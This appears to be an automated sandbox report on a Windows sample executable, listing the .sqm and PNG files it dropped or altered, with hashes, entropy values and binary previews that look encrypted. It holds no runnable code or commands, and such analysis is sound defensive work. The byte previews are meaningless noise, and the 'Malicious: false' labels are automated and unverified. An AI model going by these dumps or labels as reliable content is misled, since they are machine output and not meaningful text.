Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	1752
Entropy (8bit):	7.884505042548678
Encrypted:	false
SSDEEP:	24:af0ZLkbCVBB4Yu0MHaVYao2UmRGDrAP8jZbUG/Mf3Fxsaa+ZOZJkJbOHRfFH/bD:U0ObCVUYlM6w2VUrhw3DG+obkFOHRfdD
MD5:	CE3817808110C58C90D9C607B91022BF
SHA1:	0DCC4D8536E5D0FF30F607CE3A7B79EB398A4C27
SHA-256:	A3E236DA1399D482CC071ABE7D12CA31EA40503C343403A7F03F496C3394AE36
SHA-512:	A01DD1DE4B2ECA098AD8A29795DD387B1AB072A1BB65483E7B89E6F126E4633917F5B684E14510675E16271C6C9128BC8F308B73E86D3C3C1B916C7D640EB303
Malicious:	false
Reputation:	unknown
Preview:	MSQMx;....(..rCJ.".%Z.{...G.'."....M .W....G.=.7~..:.^...n;\~,@..8..Mi.v...w.N.=........`...s..G....Ye...5.0...X....."....>."...;..T.ko...u....z(...Z0`/.....X.._.?3.a...Z..V...#d8f.$F..N.9ts ".y.S.........r.)..D[2.&L..4../.....M..b.}VEW...Yj"....M.-c0.+.....hA..M....]./9j.}..._&... K.i?.)...{.<.........t..f,x6@..~...wf..#V8L.N..c-.z%.L...R..........5f..qk].Y........j>...^B....E..9wv..r[ "Dyb....O..s..<........0.j...k.0...,...........Y-Z..;.%.p......Z[....f...R.....CLvZ.H2..BV!X<.p...m.....,K..5...@.....s.CE..{.x._."-..1T.\|.bv..N'..F1`RQ.a..fN=.f`..D+.HR.......j..`...84ys...c.....g...F.PA..~X......GM.....Rp.>x.+..Ko...k1>K....B.Y..P.....%T<..;{......;.E... &5.A....a.G0T.?.....;.'..x....~..^....../XY.^k...g{.b...#..4y(..fR..xV{....hw_KN.......:...w>.by..<....).1..O......eb..q.......M).).0.....,.Nt..>d$P.k`'.%.K...[..quh...p.1..d;..@..K..^.Vbe...}..<.....c).o...N..8x.g^.^....9D.>r`CJ!.............BV..t.!.o$..w4;...Ze..w.l. ....lu.664;

C:\Users\user\AppData\Local\Microsoft\Windows Live\Bici\_01.sqm

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	1140
Entropy (8bit):	7.818874730209985
Encrypted:	false
SSDEEP:	24:jBT0+LkmzIECRcBlQ5NJPa8bnwh20YUI1hR7rDv0hmfzyLDbD:+KnCkQ53aE70Yj1nrDv0EoXD
MD5:	C8EC6552FCF6E04CF572E91DCA9444B5
SHA1:	3A2CFA3DE6F369673692396F1E1D632EAC16BF09
SHA-256:	1148DFC2B376FC260AAB92F57CA1C423D3C25BF97054DD90903354D4D02196C6
SHA-512:	4A121CF1703061D1B59F8AC47444171A66188FDAF90EDFDF6C47EC32E4B9877465558DEC281B651C4D930B024037BB519DD15ABDB81CAB30F8DA86FC5B2DA218
Malicious:	false
Reputation:	unknown
Preview:	MSQMxERG3...J.t..T.O......Q.=...`9'..@.W....M<.....T........UV..dF.`.O..........fn..O...<.}.Cf........y.Iu..i..\>....1.x%....x.$eeL.....<...<n.>".........}.uq]F...e}...n..2...n.@+J...l.D..a......y...4.c.Sc...6....2a..E(..[..Ka....b{OTf.L...G.2..s:.Y+.f.0"X...G\.=5M.+#P.?...T.$6>Q.f8....P']......,.....F.........T!+.Z.....L..~....gA..D....=.2..$u................o...F..P........2.....Qr...=>._..2kR1..!).(..J..$.Tut....&n..0H..w&1.a>G.......x.f...j .....r...........'....,...wA........rMcQ......Ue.....6.[../..;x6QKLv..r?}.wK..G;...2..-.T..[.HQ.?.....Q...P...n`.s...k.6.............T..d[T\|..z_NK?w.......W.\........0.$....\|..'..1....\|p...h.....oe..b..1.Hc...j.VY.....R8....G:`....@:&.&..CRt49Mo&.}.IM>X....}P.t).>.. ...^.x..........#..Z8T.@.A.L...&.X....D...1....7..mU..Y.4..uj.^..9...g.....E..<Z.......g.e...h.....P_..LK.z-7X*..{.e1.PD..-......K....."....GHS-I{..F...8..g..$.....,...K!...{..y..]",.,....<O#"..p....N..........aBZ

C:\Users\user\AppData\Local\Microsoft\Windows Live\Bici\_02.sqm

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	1038
Entropy (8bit):	7.784680257455865
Encrypted:	false
SSDEEP:	24:Y4QHWzCrdN3ViBW8iakXt6JCFcxzwbR0byWbD:Y4Q6CjliYtICFcSbOBD
MD5:	F4FA23190D4EDBEF344424751D7DACEA
SHA1:	B2802BEAF1B9C278E49C5BCAAB91A076F2021D29
SHA-256:	37BE5692A7889539276BD851CFE3589DB2775AB8B1010C44CA8E98FDC7F9FECF
SHA-512:	772ADFD38037BD39BCDFAD3A12B1CFA70720A86E4669EEE66A14F88A340A1060DFEB4BCCB516E8652654F645F9BD1274CD5DB03F69F387A732C559EA1723B537
Malicious:	false
Reputation:	unknown
Preview:	MSQMx ?.G....8.K..+..GS=3.b.....w.dE.z......%m.1umz....l..d..O..p..+.~..2x..[..)......a9Q..W.K7...\.5i.W.Z...E..T9.......}..6.R...]T..Pq.o.....vS?} B[H\|.?..1..#.6...Y.Z....s.aa80....Y..h.\|..z^Nr[ .ri.....]....W....971%.n.CJ/.X..6...i.s.IzA..il.....g.y..+1..."=!.7.g..Y2o..;.YW....n......ST4,y....6".vt.Io.s......:m.O.....N.G.%2.#]-..L$..n....u~.....q[F....../`.........'Z.....M....$7h5.....c....!m,..E...#.....j.0.'...[...e.j\|.\..=..F.-.k..5G.......I.9M................7~.[\|.;.......'E.m....V..#M.....L..$.nC.].6...OQ.l...U.{>.yq.......:.&+s."F.GS..7S.Fg...uq.w..v.......n.b.}.>..o..P..x....0zV...5..<...s.:..W.M.{....ud`...i<....N. ].D.x....f...O....}.{...+.B.]...\|bF..~.q/...z..wU.Zy.y.i.........:s..Dm...Z.yK.r..............A[]....;..k.......<.wL........"v'..'.X..c..C...a6.C.S.;l.ox.NH`.L.U...Ra.ni..mY.E0.y...i.1....bU+....,X...-..U.q.C.Sl%B..H:...8...II...*...5stoW..r`0.a..;....lEv...snsFE."..+._..`..K6te1YGPnIbo4GcGOEP3iHx1cFFHBUeguxRGm3XS

C:\Users\user\AppData\Local\Microsoft\Windows Live\Bici\_03.sqm

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	1230
Entropy (8bit):	7.822709067343889
Encrypted:	false
SSDEEP:	24:X4YAg0hvMT55Rof2ezGRhjQbC9lwrfYmEKUpv3vHDWjgh3bD:XShvc5RkpzGr8bC9lwzUpv3rRtD
MD5:	44F32801CA8056465122EC61907B5DE8
SHA1:	AA78A376A3C6C17A0CD90BECED77366ECD9F0266
SHA-256:	EA63213605FE12669875803545F70F629DF6E768BBF5D05A482A385B48D46EE7
SHA-512:	4A531F5FCAE49A1C93B429C87160A16F0C5F1AF7174C9D30434B7A4993CCC6124B44146B0101D9797EDA7A0B8F915659E5446D6B7722B774709FF1E8BA94F094
Malicious:	false
Reputation:	unknown
Preview:	MSQMx..X...{.h.....)A.7.:..8.......&iUb.h.?....9Y.0Z....$...ykk._...6l...8..bt72...Uf...+..Y4lB.%L......G....O....9......B.+c.:.. .o....dO...!..U.K....CI^...8....V"....\|2T.e\.e.....@`....om. ...8.H7..WG.z.\|..p"......oX..c...X!..I.\|.U...(..n.......8......}..s....GOE.!..."RB..C......../..T.i...v.J4..J.T.....W......_..V...T.=..ZOh.^r._....d........b.ne,%S.zB..La3....D...v..q.....x[N...0.w.....x!}.\o...<...l$..n_...7K9..~.z.e.~vF.^..&E.v.c.hU..d..nr}..!.8...d..3}..`3.....2k.;.$M^.a._5.g..%1..+...3..D........T..K0K.H8....s...r...E.n..:.........us]7.p.......-..E..\|.{~.;?..X.d.0..?...@p..t.r...~g.d<c&...l.....4.V]...\...x(;...H.Md.....2..KZy...5..6fjoQ.Gw...]..S.cH......j.[>..y...T..7.&?.6.e..CB.E!/.....Pa.+Z..G[.K.t}...oC..^.I..$..._.3..0...R.'Q.P..... ?..`1P..V....y......%.=..4O..p.Tp.}.`3Z`..d.......?...x.u...1......f~K.?r&...h.'....F......o.j$..j_......t~M4..........{..7.!VInfU3^..K.t..B..LX..F.RX....x..@Y.......n..D\|5.{.I..C..-.-.......#..@.

C:\Users\user\AppData\Local\Microsoft\Windows Live\Bici\_04.sqm

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	1100
Entropy (8bit):	7.804917573052824
Encrypted:	false
SSDEEP:	24:f955+qFfyGvcJqBxPmv+eY+pF60TYXeOD8vY57JpbD:V5oqFfyNJeKy+pF7UXHWY5lJD
MD5:	4FED3FEAF3F36278EBB06617DC259C0C
SHA1:	2A31F151219FCF246C854CA97E2D5D75D217ECAE
SHA-256:	5564BF7A6DEAE25ECF797D9B00DEC555EE33059208B2904A98E45E65FD7658A4
SHA-512:	1768A72560AF634527F189F4E5359D7A700B66C1862FCB5C186E68995E0E8523BEBA2B24A24D938F9DF5F5A88CC5DCCCB43ABD51B7D364F4764071AE1172714C
Malicious:	false
Reputation:	unknown
Preview:	MSQMxU{L...r...nt.%`......1c..xJ...v..Q.f....wI.4z..kG.E....-.UbU.2T..M)e.&..M....p.7.-R...".g.Wz..A.......@...f..A9........e..........).F.......C....e....^.J.....m._r/. x..-...m.qG9.Z>..&.'.....E..=..v%..6W.7.8..U i...{.l&!.T.A....]..`}]..DENO...IU.......R.W.69_.ns......E,...kh..J...J..8a.......[T.H.no.. UT...eG.B.S...7d.].?..>T..H.......xO..!p...`.......Kd.a.'Ct.......y.4..r.ndZ&f.SI.u4...........O.8....[.....Y..r..LHp.......Z/...'....6Q..on.O..y..B.5.=Rm.6...U1..'..'.9.~...w.o.<.......ac....\....&.0 .E_.....j.G.I...y.w.9..OQ...\|"..E.?....s.........L..Z/...HC...E.r.y..b..\fu..U~...S....M..H.%...[...jy....A..D....,.G..........wuaa.i....O.+....7.pw1HmGI.7....i....4.......;...z..]..M..m...]X......#1........3...M..7.EUY.&hC<.U...d..[.y...n.C,..l...$...l..?.L..Yh..o.U..2..oAV2.4.j.9.....-.U$s...#....8.....P..5.(..VF!.;=.7..uSu...W.;....O`SlA...-.k.....G.o. .Q......@8...j....B.[.......c.c.D...r~EJx.v...NOi@.nr..T.r=R.....K.......C

C:\Users\user\AppData\Local\Microsoft\Windows Live\Bici\_05.sqm

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	1078
Entropy (8bit):	7.807452512824938
Encrypted:	false
SSDEEP:	24:AhC2EMpBGC4POQ5EvIaZHuJZT49goMsAE477V2ZtbD:z2hBGWYatuE9vMsoVYND
MD5:	DD6A962746ED29FE1FE0AB97135CC2A2
SHA1:	517B0DCA81C56BAD9F5C51B3AFA4E0B1DC397ACF
SHA-256:	834F8E82D26A4A9E3F21C5FFAA0D91A8EE31B019D78CDF390CD71D3AC07ABB5D
SHA-512:	008ED27BCDDA4791B5AB43B348AFEFB01A14B73145FDF36A4A6C10149B8376CE2306053E30842425122452A65E36B5C125C59095435501BC24CC78C4138C7AC9
Malicious:	false
Reputation:	unknown
Preview:	MSQMxp(....nR+1.sO...'......v..q+j3.....V.....d.ozHmT.ys..i.wXUf....f....'.....jr.t.A.y....;........$.I...e..C..3...p.@. .R...D...........f...^...Q:.,..........7.~@..&..aG..!.Z1...O...).w.#.......A....S..b...t:.b..I._3.K0n<.d.)....E-..%d..>_..M.]d+g.{.:].U.j.Hd.&.:m......>R....wa....h...?. K&.n4[..{....!..s.../9.].e..(C......}.....mZ....m.}.....=9.m.8......!.D.].J..Qv..<C3-..........LE.}PYZ. a[9...G.. .~...}..s....?.6.."=..aXZ.p....Q....A......-.i..^......8.....I.~S..\|.........'J.O,.]..K..5.#.F.`..m.\..r...i)...X.i../.'hbt4]E...z...a5\.$!1...b.z........!.=...3Qb.D.I.:.U......c:....T.q]).`..r3.....E.......0u.u.._...K..g..}..J.a.A(.(...R..p*..e$j.J..b...W..c.\u;.....j..3.....J.M).A./t......v._..p.%.ya._.#......C.f.#T....SG&.....y).\|.j..:.....3...d...H...qv..\.t..-qw.f..A.5a.mv.=..).......G@..I.Z.#.'?......5^.#!].b...,.....f.........c...O....4........`./T0..p.#.)Fn.d?.A.3...r...F....t...B+<..._.g.I.$.x#...t>.F:?O..p<.......d.`..68

C:\Users\user\AppData\Local\Microsoft\Windows Live\Bici\_06.sqm

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	1100
Entropy (8bit):	7.808250523626279
Encrypted:	false
SSDEEP:	24:FJ222tSjEUIo4/wvBUu5I2deth5yy+H0J8+5Cun/bD:FJUHUIoIwvBUu5I2I0EJZ5DnjD
MD5:	1CB62EAC24CF7229D8C290F5AD07EA87
SHA1:	125A9FD1ECB584C27C5DF035ADE0B3F9E0F28863
SHA-256:	439F1E656400AF0AAF77F90A74C0035D64CE40C0F0232BF0FA29689542A985B6
SHA-512:	DC6A262CE9FD0BAF0ACA9B03B28BBDFED9277D5C0AAC8E4878D0ED05E014F6A8BF89ABAEAE3CD39AD5A565E9AF7D5B1C5BE2B0A5E51DDC492EC1F28E0F04A20A
Malicious:	false
Reputation:	unknown
Preview:	MSQMx.1Ch=..U._.E....\.bm7.....x....)&.I.7Xz.rq.$ ..C...w.#..d.".o..F...d_...S..k36.F.<.noA.kW\|..;..........Q.\...%..n..P.1..U.$.+..1...v..k...b....F....-...Z.....BO^^.5.k..B...'.......}.]Z....m.%...~.x.2..d...p.\.}.@...L.i[...<E../]."k.,.M.....xv.....~.e.x.....Tb....L$.....g...BGr.H...02....p..(r...1....&...R.Q&.u>2...!+...p.\.3...."7j.Nh6.-..l..t....\|.p.Tz....Gf6...#.L.....t.....L...@3."K..z..~z.............(...E....m...X.TX..mV....Hj...N..?..z.rX..0....\...1...?.h.R..?0..4.....\.....y{.>.U\i...p.].+.A./^`F....Jm.............c......r..-$......W0........<I..M...9.1.G...`.Y......2..Dn...W.e....\|.b..z..6v..4.U..C.......7....5O..X.H..._F.k..6b.~=....&.s..Hy.Cg-..,1.1...Dg.....z.\}.u..h'.....Lk..s.U.kj$.N?....Sg......!.Z$.^.-.-<~l.......=.46...mv.00v.O.......A....+..K.....l<c......>85^c....b)4..Z.D.....}.D...]8.%......D.A.5v.H..[".L[.Q%3....K......+..}4.eS...s.O.4xJ..R.........'.>"$..{.\|.!Y....j\|h.!A....Au._F..=.I2..\|.'>

C:\Users\user\AppData\Local\Microsoft\Windows Live\Bici\_07.sqm

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	1078
Entropy (8bit):	7.797504808246656
Encrypted:	false
SSDEEP:	24:BU/NwxeCgP10vYEM7xX7//+JBfF+E1O+9pcVsbD:2N4e50HM7R7n49c+9pcVmD
MD5:	3867312CBB3D08D2AE4F0B14B9BDCF11
SHA1:	C4402BCBAB4DF94A0D48D276EB1D125C8A486344
SHA-256:	C07E53609BD1BA091C1C86849BA1F9B3E5E905B955C281463B14B1B4CA1417A1
SHA-512:	C468DA53886B777836CB7CA246850857EACFB85BFD27F6B89F456865C2903EDF1D9DAF9B1F6DCAA43751DD9D2A4C0805934EBFC31BF201C157D9D1BFEFCD5422
Malicious:	false
Reputation:	unknown
Preview:	MSQMx.._s..7tw..(.>o.Z...c.!z.(.....1-xA\|......yW.6'.g~..>...'.C...."..o.""...w.P...:...jL..#.....>>o!...:0.;...O.N+c.u.)_Qh..9..=..2.........Xg.5.j...M....1......../.f\.,.co_O`Ir[...r.U.Z.T...z..QqIy..`+..G..W7^p\B..p..S.......o..........e6.....!...,^....h.........../ST!h..0.1Y,..-..v`.........M..}uH.fa..noew.~....1fE....G...n. .C...>l.9.S..c.K.....Y.`<.O\s,........g%....3}..[V..Y......,..S..........z..D._..G........1g.;'.......E..-.x..4.w./^...E.iT).b._.\|..V..-'.e....y.eX..0.:.~....n.....'.0....o.(..T.d...Y=.]8...0.=M....nH.Pl.l.1.S..r%J..+.o...V.k$>...oX....6W.X...R.k.t5..!...U........mw.?P.[.0.X.1.....8.....30....i.......m.T..Sq..z.......E...,.af....<p...y.j....d)J.82W..,........A.B$.D..Z<6.....f.8...UW98l.P..Fg[...fx..."...`..HX.]...VImp.w.....p~k]..E.Dc...>IVZ..z7...F.<.48..?.....Z__...TC............Ii....i...%......B..../!]t.j.......Y.<v.7x......Z......U.i$Wu.?.....+.+.${.d..!y\....Z'...n...U2...D...J..gFy.\..!.....@

C:\Users\user\AppData\Local\Microsoft\Windows Live\Bici\_08.sqm

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	1100
Entropy (8bit):	7.815198307130605
Encrypted:	false
SSDEEP:	24:Rim6NT8Wh5ut2dFNB4eawMVyTYXqCZwL+KpDO8wPqYbD:R84WPrd54eawMI+PwiKBORqCD
MD5:	C4B0C3AC49AD4A6CF78442FFA2C589EB
SHA1:	120D0DB3D32C373C215CA6118AC128B08F62C7A0
SHA-256:	CC41AA87FD2A8AAEA2A246062357729ABDA8DA324B4F23451089B9E2515BE9B3
SHA-512:	BF620B4E0FE2699E54B86ECBF3AFD41A7A9FAD432A0F1CC4B58AA01F4E47510C2CDFDE9DE8B558A56BD240B86F39E6B88CED736C1D77CC7967872291E0D4C014
Malicious:	false
Reputation:	unknown
Preview:	MSQMx......}V..Z VvDY.....e.......#..j...[x......{...M..fj...+..e....J...p:q`..K5...5..Z.......}..N.s..[.............0.g.e...yO...G...../B..a..K-....w....#:.._....XN.Yezv...............m`."C{...R.X.KS.....Jf..b"...4K!.._0.@@0.....V.......}}.e..H...z..2:I..uxyV.8...1..]..q9.K:`(..I..;$..k.A0.1...8.<4..5...7%....B...7....._~.."..t...T\|6K...:E.g..{(Nm......!i...Wq..b...h.8}4.I.0M..2.d..v`.Afz6eE!9E...t...bE....9..n_V.].....p5...2<.A..>Y,v.....!..;.'........b...4Ci.L.0.5....7...q..9.h.58k....Y,.?..yzA..;..+.....N....P..m!R.t.y.LHC.....>........dk.._...$=..._.'.^igqiM.....oo...,..R..wx..R.T........=..X......f.7.f..c...m[....=..,.q..K./y..7ga..$...p........ol.....Tq..@\| -..1.......U...saQ)......O.wT..b].p..=.H..s#..k......"E\|3`.o..f.....&.a....S..\..zE.w.......xY^Qsr./.....u...o..]P.I.J...#z....\|G2:x.~......=.1....%.i_...q..g.-8).%...4.\|+)KX.....-e,..y'*...x....f....7....z.Q..O...~..@k...r.5..0........s\|o..pK;....i.y.^v..cY#..\|...T.;.U.

C:\Users\user\AppData\Local\Microsoft\Windows\1033\StructuredQuerySchema.bin

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	419699
Entropy (8bit):	6.334332125847834
Encrypted:	false
SSDEEP:	6144:tdyfH1EhKhukWL57CWnF35jcW/yozbi+z4b8ahQdcFFcWAF3niI+oA0J:KH2ghYMGNldzbi+wOcFFcW43iobJ
MD5:	4353BBC19E9D7A9C2E2999DB72ACFB25
SHA1:	06665D88E4F12831A67F75BEB1EB6254201CF9DD
SHA-256:	CC2DAD395706338EC32DF7D85A037ABCD6901DDC2302427197ACF21C540F89F2
SHA-512:	0846D63C5F45F62591A0393C8D45B1A2B31A8250DBB5D873D9284482337CAF6D282362FF354986AA6E146C813D3D354E6E1823E8DE8DD45B142B156FCD06D07D
Malicious:	false
Reputation:	unknown
Preview:	...P.l..h..).....'..nP...K.p..u.[.(...;.0].u...t....1.Z.D...XJ..o^..[.Qc0Qw..w0.`.ml$%.b)id..5.$.s2.K.M..........K.n.6[....-.dV.....#].R&..H.....K9.FWb..,..ly6/..:..W..xJ.].....u..>R..F..(..!Fp~..&.dO/...h...S....H.m&.!.Z).......u.f..:.$dO......c.......2.6.Y.......L.;.B....l.j#!..........~....X.:%qv!.."..C..`.?......."..p......./`=..W..r.(....v...5.).B5.$A=..Mas.zf@.Z^}..*....j.WO..l.h2....$b.>..F..P.t...c3.#.7..YcW...I!..6>..........L.....I.....M..P......TA.>4.w.tj....a....a.Q..$......... uy.n.O<p...[....7.....tF... W..3X.[p.].^..Sv ..[7.B..\}.......jF!.U...................Y...X.2......iB........).$N-.K.z`...p..y..R.?..%y.5...#....g.......'W..}C.B.:/.^\!.h..'....ak..(~.......S..J....=..-z.^.rE."=..r&..&y.z..[]..(Y..x.Hx...,.....Y.s..g.qd.7....v.`.V..+=E.,O1....B.j`._x.dH\.B+..>h.......cQ.........W.5.~...:\.P.P.v%...wH..`.L.}p.@....=...6......h.y.7!9...{..;...: ~.i..j_"..7^..hn....^b....Z9.'...u..bqPM.;C@m.....o.......&cy&5.5.....@..=y

C:\Users\user\AppData\Local\Microsoft\Windows\ActionCenterCache\microsoft-skydrive-desktop_16_0.png

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	3385
Entropy (8bit):	7.939680145866848
Encrypted:	false
SSDEEP:	96:onrAwfIBFcIR9xF/K2wTMf4zITI7dC5vt8:orJK/xF/KtYf4z8I7dCJt8
MD5:	B79A529622152D9FCE8DAEC73728F218
SHA1:	9AFAB52B37F709B9CE031A60385F77970169105C
SHA-256:	6D8329DB79A3036041508BDB98BA11B59D3131F7EC813C8C206F541FE3E092BE
SHA-512:	3F7321274A15136BAF783EE63E1485B5175F2947BBD491E225680BE6078D29E65693E49BD9BB4DC404650DF7BEEFE8BE83BE18E8CBFC8AE445A33F7771343799
Malicious:	false
Reputation:	unknown
Preview:	.PNG.{.....V...I~Z._......%......N.etN..E.....m..X....a....r...!B. .....V..6....x.B..k........A......9...+.I".uz..!...X.Y^I9(..x.\...........N.b.`.....vy\..{O..j;....o}.z".,.N....1..[4.`...v.MOC.....^...4.F8.."..A..Z.......^...?..;....KV.'.e....d...-.~.ne......v...\|f../.$.y[.`&^.Jy..w............t.....V.>/.4O...'D.>..>p..!. 9..(A.^f'....1...8..k.a...OMG}....{......\|./=..6q..M.s..l.-.}.M.k.I.N..h..1.2.0..$.!3$}OTX........}..>..M+.......I.L.,....]eaW..YG..C.93....b.g..8...N..T....KKE.b...w.x.u. ...D....(..........Ptn.O.>.Q....#...e............d.....C...X>.2.W..T3..Uv.Rm.{45.1.J.b..F.n....j...Q....s.........JM..?+@e.....0KQ`.fw..qx.i._=a.<.(...$. ./7.tO.x.M...L....&..\|g......Y.....ey..m.}.R.s..o..(...O.O.l.e...B?..V......{...UG....A.PNE.$../.sAb......nt.U.y...Q...PU.>.....}9.~H{..a...q...1E3W....h.<......d..La},..d.>.q...2.,[..j".....r.H..(..A..N..7i.5#.5..9....~ ....h.....X.9.$.%..>%X.b......!2..n%.s7.....$...v".._.EO.YquhM....G.b..p.;..&-

C:\Users\user\AppData\Local\Microsoft\Windows\ActionCenterCache\windows-systemtoast-securityandmaintenance_11_0.png

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	7207
Entropy (8bit):	7.974504076742161
Encrypted:	false
SSDEEP:	192:Jqnc1nDCRLjVWcgVJC/thhGsc1LMtmXjOQUnqz:4nc1nDCRfAdUDyMtUKzqz
MD5:	8F56C3AD1D91BCFDDC1FAAE37933190D
SHA1:	FA924815BCCEADB4A2C018D53AA9B2F5EAEB13CB
SHA-256:	6263538E64678C500EFE2DC634C2EA016EEA4683435EC94A36F68600ADE5F908
SHA-512:	27E820B99EAB39877F81CEFCA6BCFBA4819D6DF2C7315CCA93848B02AB0557F7C076C58CFFEBEB2A830387CA7C5267072B962B66821C1BC4255F12988426D1A3
Malicious:	false
Reputation:	unknown
Preview:	.PNG.....Q.r.#.Q.f.sX.k.......hw*D?.Y..G.C>K...I...o..^.\..-S1.&c3.wK....;..,..w{t...(.....tkaWJP.?`~......t..b.H.W..e.y...;.x.z....G...\...Xd)...{.gt.\|...>...u$...E..K....iQPDK.=v.A.V.K.@...w.&.e.Z$..GTI.D..A.H.+..?p.....h.e/=..&<..6:.x.7...0.c.....j.\|.....bRMJ...,\.=.Y..cKn.....-....m.P.!...$...Q.,...x9.W=.j.0-Pl.R....5.).:.....l.......J..@neX..P..@].rf..0...0.CSd........;v......Of..O.{.a...zDu....xA..N..4A.w..............g..4._..s.k.....v2.>p....Y..0..W@]P..T..O.Z.HmR.3.2.#.....k..P"../..N.z?V.:.-Y...b.'.e...U...x'..."....x..-?$...\|f#6.1&.s.)............6z..wv...e"....9..e.Z......drl._./.O.5m..e..iw....O.....y.Q..O.~......D.....h[..u.C,...Q.zp..5.{.%,z.Fy..Mw...aN...'.wk.G..s......5.......P9.#.j......t......N.k.&\|.J..$..BB..e\|..I..`9..&..?d...xU.h$z.o.#.T.`.W.E4....(x.r.E.....{\|..%<..S.....J.gs.]..Y.y..L.f.j..]...s.u..k.<...oC..c.k.../.)...,I5.ge>/3.b.J-.N>.e........P.4..j.'~h:.~....p.e.63.c...2.$.(.p&....p..1..dP.m....VG.".M../....

C:\Users\user\AppData\Local\Microsoft\Windows\ActionCenterCache\windows-systemtoast-securityandmaintenance_17_0.png

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	7207
Entropy (8bit):	7.9764923825029586
Encrypted:	false
SSDEEP:	96:9M5Y5s+MeRfFKE4K6jjS1AGPOtwBflnbg7Ia/dk2Xri7V/yZbtgHAXrOGo92S:ACMeRp4QAGGElnEv/Sgr3CgXrSZ
MD5:	CC6BE65B6F67CF44BEBAD4435FBEBB89
SHA1:	2E2C76A64970B5DADF22FA20BF31DC740887295B
SHA-256:	860BD6C70312C9BAC07BC2AFD2251C353380CF48F54A7444F4FABD27EF127FB4
SHA-512:	1E9BA382D1E94713B21594C02E8D8387E28FA23A85A66793CEB2DEBAE98BD4D6854F080FC05B126FBF519AB31A2B3636DA466C79C21F43053EFD7A17A0E8479D
Malicious:	false
Reputation:	unknown
Preview:	.PNG.A+C.k..U..u...\|;.f.\|t.......x0............!.g)C..........9.(.."...R....Od.CU,..(..X."U..#...l.unKv...0...-Y. B....Iu.#[..N...`C...$x....(.s..0p^.]Z.....N.0....^8FoPw.....j..!....l.B.QWOs;... v'[h.]RO.r....T)o.\..\...5...q@+a#q..Le...t....w.N...n....._....x...<..;1c......\|.P.}xP.C.e@....{'...U...<....`.;.{.........E.\|F'l......C.....&}.O.W.....s..<..q...#...-Yk.}5.Q....\.g ......S....}(.......7..K....v.u..X....iW......)T...\|,~V...Y.Lq&..O.....u..j..v....g=.Q.a..{......y2R_...(.}F.p..Z..-....P~r.p..S...O...5.&.m.x&p~z].!......3...E.~l.RM..g........4\@THs........f~...L..^._...5.X.a.~e..#.......t.......T..F...V...'..5/D.,/..F.....y..Y. .@I9.u...+..K.F.jV...iF/...$.$.O`:2,/....F.._..._...im.D.1W.D......=...\[.@.6...2..^..'.M%m..L....b.....hO.....\x;.V..w:..F^...L...F...uA...n.B.....tb..,.@..... ..nr.C.(.:.Z..T..v.".S..Y..u..S.N...Mh0...Eb...<$N..Z@V..G.Qn........6.?.....+.i^..j...M...to-.....)`.... ........{....U.(\|

C:\Users\user\AppData\Local\Microsoft\Windows\ActionCenterCache\windows-systemtoast-securityandmaintenance_22_0.png

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	7207
Entropy (8bit):	7.976944298742274
Encrypted:	false
SSDEEP:	192:SsxaxkdtH32WpdLXfjf94qwx1F0ml7tOlLBIJW+m11aKXQ:Ssxax2tX2Wpd/+qWYyJOds5m1Q
MD5:	0B1AA313F37F287F46A0C6008BAE69D2
SHA1:	E89F666BA7447D151DFD167936D7621DEA973E37
SHA-256:	CDF0F65ECDCC8C57C9A86A784D786209B91CE91D42EBDD7FA2C51D63D7ED2C09
SHA-512:	E644D1ADB72B4911350BAFA25F86861D1148DE3CB28094A07307233458EE0F7FEA36816A3756D5A40E33EAA3F97ED9DABD329F9ACFB0CDB0E0B1B4B77F5851DC
Malicious:	false
Reputation:	unknown
Preview:	.PNG..M.........5-.....MT.....6-.M[..N............J ...N.p.o.~r..y2.6...?,$K.......X.RH._I..o E...v.B...e....#.E....i..4.......z..\'.m.%......A...=...d....W...1..P..Qu.l.......Cq....Vb`&..v.t.p;...B.....QE.. .R....xO.]y..).N...0.....a.......A..1P\|.Y..v..._..[)(....a`..aQLB..ke.!..^.-Q.z.r..p).C1..sE8..c..Z{..g...z.1[..#....t@.$.zA..K.:YiV..h....U.b..........(=...E.fmU........A..3.-.@..Ah<.Zb.5..#.........`(...}H.V...\.....;........<W....3'9Fo.dy...\....3.a...Z....s]f(N."..x..iyH....2O....%..;.<Z)...E78...,.,...{..C.....Y ;...p2...a)...V...\..k..h}X..M......F"P.......Qe.....z.N.=w9..)"O.......j3....A.s..U..n.vY.....C....$.+...g..Mo..m....Q."....x..{_X.T`.....G/.....o.........C....5Bpo!E...x...&..=X-...r.Q...#+..l..J.=....../..s.f+=..T[,2..w.X...T..w.w.z$..*3...........{.&..>.S....s.n..^.Db.}EC..#......k.V.........%....p.~-.D.H5$.....`"s.N2....~.=.[o...n...&.7..:~....!3\.f....Z..U.l.j.(.s.E.,.+.y..9....]...nN.qk.$.3U.s........2.56f(...H.<O.

C:\Users\user\AppData\Local\Microsoft\Windows\ActionCenterCache\windows-systemtoast-securityandmaintenance_23_0.png

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	7207
Entropy (8bit):	7.976626938255001
